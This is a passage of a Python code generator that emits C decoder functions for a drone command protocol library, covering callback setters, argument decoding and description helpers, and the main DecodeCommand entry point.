DECODER_CBNAME = ARCapitalize (get_ftr_old_name(multiset_msg.ftr)) + ARCapitalize (multiset_msg.name) + 'Callback'
DECODER_CBCUSTOMNAME = ARCapitalize (get_ftr_old_name(multiset_msg.ftr)) + ARCapitalize (multiset_msg.name) + 'Custom'
cfile.write (' if ((multisetting->'+multiset_msg.name+'.isSet) && (decoder->' + DECODER_CBNAME + ')) {\n')
cfile.write (' decoder->' + DECODER_CBNAME + ' (')
first = True
for arg in multiset_msg.args:
if first:
first = False
else:
cfile.write (', ')
cfile.write ('multisetting->'+multiset_msg.name+'.' + arg.name)
if not first:
cfile.write (', ')
cfile.write ('decoder->' + DECODER_CBCUSTOMNAME + ');\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
cfile.write ('void ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Cb') + ' (ARCOMMANDS_Decoder_t *decoder, ' + ARTypeName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' callback, void *custom)\n')
cfile.write ('{\n')
cfile.write (' if (!decoder)\n')
cfile.write (' return;\n')
cfile.write ('\n')
cfile.write (' ARSAL_Mutex_Lock (&decoder->mutex);\n')
cfile.write (' decoder->' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback = callback;\n')
cfile.write (' decoder->' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Custom = custom;\n')
cfile.write (' ARSAL_Mutex_Unlock (&decoder->mutex);\n')
cfile.write ('}\n\n')
cfile.write ('static ' + ARTypeName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' ' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Cb') + ' = NULL;\n')
cfile.write ('static void *' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Custom') + ' = NULL;\n')
cfile.write ('void ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' (' + ARTypeName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Callback') + ' callback, void *custom)\n')
cfile.write ('{\n')
cfile.write (' if (' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Init') + ' () == 1)\n')
cfile.write (' {\n')
cfile.write (' ARSAL_Mutex_Lock (&' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'mutex') + ');\n')
cfile.write (' ' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Cb') + ' = callback;\n')
cfile.write (' ' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Custom') + ' = custom;\n')
cfile.write (' ARSAL_Mutex_Unlock (&' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'mutex') + ');\n')
cfile.write (' } // No else --> do nothing if library can not be initialized\n')
cfile.write ('}\n')
cfile.write ('\n')
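# For every command that carries arguments, the two loops below emit a pair of
# static helpers: <Feature><Cmd>DecodeArgs() unpacks the arguments from the
# network buffer, and <Feature><Cmd>DescribeArgs() appends a textual dump of
# those arguments to a caller-supplied string. The first loop only writes the
# forward declarations, the second one the definitions. Illustrative shape of
# one generated prototype (placeholders, not literal output):
#   static <DEC_ERR_ENAME> <Feature><Cmd>DecodeArgs (const uint8_t *buffer,
#       int32_t buffLen, int32_t *offset, <arg type> *_<arg name>, ...);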
for ftr in allFeatures:
for cmd in [cmdx for cmdx in ftr.cmds + ftr.evts if cmdx.args]:
cfile.write ('static ' +AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) +' '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'DecodeArgs') + ' (const uint8_t *buffer, int32_t buffLen, int32_t *offset')
for arg in cmd.args:
cfile.write (', '+ xmlToCcharAreConst (LIB_MODULE, ftr, cmd, arg) +' *_' + arg.name)
cfile.write (');\n')
cfile.write ('static ' +AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) +' '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'DescribeArgs') + ' (uint8_t *buffer, int32_t buffLen, int32_t *offset, char *resString, int32_t strLen, int32_t *strOffset);\n')
cfile.write ('\n')
for ftr in allFeatures:
for cmd in [cmdx for cmdx in ftr.cmds + ftr.evts if cmdx.args]:
cfile.write ('static ' +AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) +' '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'DecodeArgs') + ' (const uint8_t *buffer, int32_t buffLen, int32_t *offset')
for arg in cmd.args:
cfile.write (', '+ xmlToCcharAreConst (LIB_MODULE, ftr, cmd, arg) +' *_' + arg.name)
cfile.write (')\n')
cfile.write ('{\n')
cfile.write (' ' +AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) +' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ';\n')
cfile.write (' int32_t error = 0;\n')
        hasMultiSet = bool([arg for arg in cmd.args if isinstance(arg.argType, ArMultiSetting)])
        if hasMultiSet:
cfile.write (' eARCOMMANDS_ID_FEATURE commandFeature = -1;\n')
cfile.write (' int commandClass = -1;\n')
cfile.write (' int commandId = -1;\n')
cfile.write (' uint16_t multisetSize = 0;\n')
cfile.write (' int32_t multisetEnd = 0;\n')
cfile.write (' uint16_t cmdSize = 0;\n')
cfile.write ('\n')
cfile.write (' if ((NULL == buffer)')
for arg in cmd.args:
cfile.write (' ||\n (NULL == _' + arg.name+')')
cfile.write (')\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n')
cfile.write (' } // No else --> Arg check\n')
cfile.write ('\n')
for arg in cmd.args:
if isinstance(arg.argType, ArMultiSetting):
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' memset(_' + arg.name+', 0, sizeof(*_' + arg.name+'));\n')
cfile.write (' multisetSize = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' multisetEnd = *offset + multisetSize;\n')
cfile.write (' cmdSize = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' while ((retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ') &&\n')
cfile.write (' (*offset < multisetEnd))\n')
cfile.write (' {\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandFeature = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandClass = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandId = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' switch (commandFeature)\n')
cfile.write (' {\n')
                # Regroup multisetting msgs by feature and by class
multiset_sorted = {}
for multiset_msg in arg.argType.msgs:
multiset_cl = multiset_msg.cls if multiset_msg.cls else ArClass('defaultCls', 0, '')
if not multiset_msg.ftr in multiset_sorted:
multiset_sorted[multiset_msg.ftr] = {}
if not multiset_cl in multiset_sorted[multiset_msg.ftr]:
multiset_sorted[multiset_msg.ftr][multiset_cl] = []
multiset_sorted[multiset_msg.ftr][multiset_cl].append(multiset_msg)
get_name = lambda x: x.name
for multiset_ftr in sorted(multiset_sorted.keys(), key=get_name):
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(multiset_ftr)) + ':\n')
cfile.write (' switch (commandClass)\n')
cfile.write (' {\n')
for multiset_cl in sorted(multiset_sorted[multiset_ftr].keys(), key=get_name):
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(multiset_ftr) + '_CLASS', multiset_cl.name) + ':\n')
cfile.write (' switch (commandId)\n')
cfile.write (' {\n')
for multiset_msg in multiset_sorted[multiset_ftr][multiset_cl]:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(multiset_ftr) + '_' + multiset_cl.name + '_CMD', multiset_msg.name) + ':\n')
cfile.write (' retVal = '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(multiset_ftr)) + ARCapitalize (format_cmd_name(multiset_msg)) + 'DecodeArgs') + '(buffer, buffLen, offset')
for multiset_msg_arg in multiset_msg.args:
cfile.write (', &_' + arg.name+'->'+multiset_msg.name+'.' + multiset_msg_arg.name)
cfile.write (');\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' _' + arg.name+'->'+multiset_msg.name+'.isSet = 1;\n')
cfile.write (' }\n')
cfile.write (' break;\n')
cfile.write (' default:\n')
cfile.write (' // Command unknown\n')
cfile.write (' *offset += cmdSize;\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' break;\n')
cfile.write (' default:\n')
cfile.write (' // Command unknown\n')
cfile.write (' *offset += cmdSize;\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' break;\n')
cfile.write (' default:\n')
cfile.write (' // Command unknown\n')
cfile.write (' *offset += cmdSize;\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write (' if ((retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ') &&\n')
cfile.write (' (*offset < multisetEnd))\n')
cfile.write (' {\n')
cfile.write (' cmdSize = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' }\n')
cfile.write (' }\n')
else:
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' *_' + arg.name + ' = ' + xmlToReader (ftr, cmd, arg) + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
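        # DescribeArgs counterpart for the same command: identical parsing walk,
        # but each argument is pretty-printed into resString instead of being
        # returned through output pointers.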
cfile.write ('static ' +AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) +' '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'DescribeArgs') + ' (uint8_t *buffer, int32_t buffLen, int32_t *offset, char *resString, int32_t strLen, int32_t *strOffset)\n')
cfile.write ('{\n')
cfile.write (' int32_t error = 0;\n')
        hasMultiSet = bool([arg for arg in cmd.args if isinstance(arg.argType, ArMultiSetting)])
        if hasMultiSet:
cfile.write (' eARCOMMANDS_ID_FEATURE commandFeature = -1;\n')
cfile.write (' int commandClass = -1;\n')
cfile.write (' int commandId = -1;\n')
cfile.write (' uint16_t multisetSize = 0;\n')
cfile.write (' int32_t multisetEnd = 0;\n')
cfile.write (' uint16_t cmdSize = 0;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ';\n')
cfile.write ('\n')
cfile.write (' if ((NULL == buffer) || (NULL == resString))\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n')
cfile.write (' } // No else --> Arg check\n')
cfile.write ('\n')
for arg in cmd.args:
if isinstance(arg.argType, ArMultiSetting):
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' multisetSize = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' multisetEnd = *offset + multisetSize;\n')
cfile.write (' cmdSize = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' *strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("{", resString, strLen, *strOffset) ;\n')
cfile.write (' if (*strOffset < 0)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
                cfile.write ('        } // No else --> Do not modify retVal if no error occurred\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' while ((retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ') &&\n')
cfile.write (' (*offset < multisetEnd))\n')
cfile.write (' {\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandFeature = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandClass = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' commandId = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' switch (commandFeature)\n')
cfile.write (' {\n')
                # Regroup multisetting msgs by feature and by class
multiset_sorted = {}
for multiset_msg in arg.argType.msgs:
multiset_cl = multiset_msg.cls if multiset_msg.cls else ArClass('defaultCls', 0, '')
if not multiset_msg.ftr in multiset_sorted:
multiset_sorted[multiset_msg.ftr] = {}
if not multiset_cl in multiset_sorted[multiset_msg.ftr]:
multiset_sorted[multiset_msg.ftr][multiset_cl] = []
multiset_sorted[multiset_msg.ftr][multiset_cl].append(multiset_msg)
get_name = lambda x: x.name
for multiset_ftr in sorted(multiset_sorted.keys(), key=get_name):
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(multiset_ftr)) + ':\n')
cfile.write (' switch (commandClass)\n')
cfile.write (' {\n')
for multiset_cl in sorted(multiset_sorted[multiset_ftr].keys(), key=get_name):
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(multiset_ftr) + '_CLASS', multiset_cl.name) + ':\n')
cfile.write (' switch (commandId)\n')
cfile.write (' {\n')
for multiset_msg in multiset_sorted[multiset_ftr][multiset_cl]:
cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(multiset_ftr) + '_' + multiset_cl.name + '_CMD', multiset_msg.name) + ':\n')
if multiset_msg.cls:
cfile.write (' *strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("{' + get_ftr_old_name(multiset_ftr) + '.' + multiset_cl.name +'.' + multiset_msg.name + ':", resString, strLen, *strOffset) ;\n')
else:
cfile.write (' *strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("{' + get_ftr_old_name(multiset_ftr) + '.' + multiset_msg.name + ':", resString, strLen, *strOffset) ;\n')
cfile.write (' if (*strOffset < 0)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
                            cfile.write ('                        } // No else --> Do not modify retVal if no error occurred\n')
cfile.write ('\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' retVal = '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(multiset_ftr)) + ARCapitalize (format_cmd_name(multiset_msg)) + 'DescribeArgs') + '(buffer, buffLen, offset, resString, strLen, strOffset);\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' *strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("}", resString, strLen, *strOffset) ;\n')
cfile.write (' if (*strOffset < 0)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
                            cfile.write ('                            } // No else --> Do not modify retVal if no error occurred\n')
cfile.write (' }\n')
cfile.write (' break;\n')
cfile.write (' default:\n')
cfile.write (' // Command unknown\n')
cfile.write (' *offset += cmdSize;\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' break;\n')
cfile.write (' default:\n')
cfile.write (' // Command unknown\n')
cfile.write (' *offset += cmdSize;\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' break;\n')
cfile.write (' default:\n')
cfile.write (' // Command unknown\n')
cfile.write (' *offset += cmdSize;\n')
cfile.write (' break;\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write (' if ((retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ') &&\n')
cfile.write (' (*offset < multisetEnd))\n')
cfile.write (' {\n')
cfile.write (' cmdSize = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 1)\n')
cfile.write (' {\n')
cfile.write (' /* buffer end */\n')
cfile.write (' break;\n')
cfile.write (' } // No else --> Do not modify retVal if read went fine\n')
cfile.write (' }\n')
cfile.write (' }\n')
cfile.write ('\n')
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' *strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("}", resString, strLen, *strOffset) ;\n')
cfile.write (' if (*strOffset < 0)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
                cfile.write ('        } // No else --> Do not modify retVal if no error occurred\n')
cfile.write (' } // No else --> Processing block\n')
else:
cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' ' + xmlToCcharAreConst (LIB_MODULE, ftr, cmd, arg) + ' arg = ' + xmlToReader (ftr, cmd, arg) + ' (buffer, buffLen, offset, &error);\n')
cfile.write (' if (error == 0)\n')
cfile.write (' {\n')
cfile.write (' *strOffset = ' + xmlToPrinter (ftr, cmd, arg) + ' (" | ' + arg.name + ' -> ", arg, resString, strLen, *strOffset);\n')
cfile.write (' if (*strOffset < 0)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n')
                cfile.write ('            } // No else --> Do not modify retVal if no error occurred\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n')
cfile.write (' }\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
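# Entry points of the generated decoder: DecodeBuffer() is a thin wrapper that
# calls DecodeCommand() with a NULL decoder (legacy global-callback mode), while
# DecodeCommand() reads the 8-bit feature id, the 8-bit class id and the 16-bit
# command id from the buffer, decodes the arguments with the matching
# <Feature><Cmd>DecodeArgs helper, and invokes either the per-decoder callback
# (when a decoder instance is given) or the global one, under the proper mutex.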
cfile.write ('// DECODER ENTRY POINT\n')
cfile.write (AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '\n')
cfile.write (ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeBuffer') + ' (const uint8_t *buffer, int32_t buffLen)\n')
cfile.write ('{\n')
cfile.write ('    return ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeCommand') + ' (NULL, buffer, buffLen);\n')
cfile.write ('}\n\n')
cfile.write (AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '\n')
cfile.write (ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeCommand') + ' (ARCOMMANDS_Decoder_t *decoder, const uint8_t *buffer, int32_t buffLen)\n')
cfile.write ('{\n')
cfile.write (' ' + AREnumName (LIB_MODULE, ID_SUBMODULE, 'FEATURE') + ' commandFeature = -1;\n')
cfile.write (' int commandClass = -1;\n')
cfile.write (' int commandId = -1;\n')
cfile.write (' int32_t error = 0;\n')
cfile.write (' int32_t offset = 0;\n')
cfile.write (' ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ';\n')
cfile.write (' if (NULL == buffer)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n')
cfile.write (' } // No else --> Arg check\n')
cfile.write ('\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
cfile.write (' if (' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Init') + ' () == 0)\n')
cfile.write (' {\n')
cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n')
cfile.write (' } // No else --> keep retVal to OK if init went fine\n')
cfile.write (' } // No else --> Processing block\n')
cfile.write ('\n')
cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n')
cfile.write (' {\n')
